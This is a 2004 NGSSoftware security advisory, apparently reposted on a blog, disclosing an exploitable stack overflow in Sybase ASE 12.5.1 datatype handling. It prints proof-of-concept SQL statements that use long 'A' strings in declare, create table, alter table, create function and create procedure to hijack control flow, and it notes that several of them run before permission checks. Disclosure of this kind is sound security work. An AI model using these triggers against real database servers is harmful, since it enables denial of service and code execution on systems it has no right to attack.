ASE 12.5.1 datatype overflow

NGSSoftware Insight Security Research Advisory


Name: Sybase ASE convert overflow

Systems Affected: Sybase Adaptive Server Enterprise 12.5.1 and lower

Severity: High

Vendor URL:

Author: Sherief Hammad [ ]

Date of Technical Advisory: 25th June 2004




There is an exploitable stack overflow in the Sybase handling of bespoke datatypes. Any SQL statement which as part of it syntax defines a datatype is vulnerable to this overflow. Access to these functions cannot be prohibited.


The bug can be observed by starting the Sybase server, attaching a debugger and then running the SQL statement:


declare @foo ‘AAAA…..AAAA’


9600 A’s is sufficient to cause the flow of control to be directed to the address 0x41414141(‘AAAA’ in hex) on a WindowsXP platform.


Other attack vectors to the same code are;


declare var1 ‘lotsofAs’


create table #foo (col1 ‘lotsofAs’)


alter table master.dbo.sysobjects add col1 ‘lotsofAs’

NB. breaks before checking perms

This obviously works with modify and add



create function foo ( var1 ‘lotsofAs’) reutrns int language java parameter

style java external name ‘java.test’

create function foo ( var1 int) reutrns ‘lotsofAs’ language java parameter

style java external name ‘java.test’

NB. breaks before checking perms


create procedure foo @var1 ‘lotsofAs’ as return 0

NB. breaks before checking perms



Fix Information


The vendor has not yet confirmed the existence of the bug.


About NGSSoftware


NGSSoftware design, research and develop intelligent, advanced application

security assessment scanners. Based in the United Kingdom, NGSSoftware have

offices in the South of London and the East Coast of Scotland. NGSSoftware’s

sister company NGSConsulting, offers best of breed security consulting

services, specializing in application, host and network security



Telephone +44 208 401 0070

Fax +44 208 401 0076

Call us before you need us.

Our experts will help you.

Get in touch
%d bloggers like this: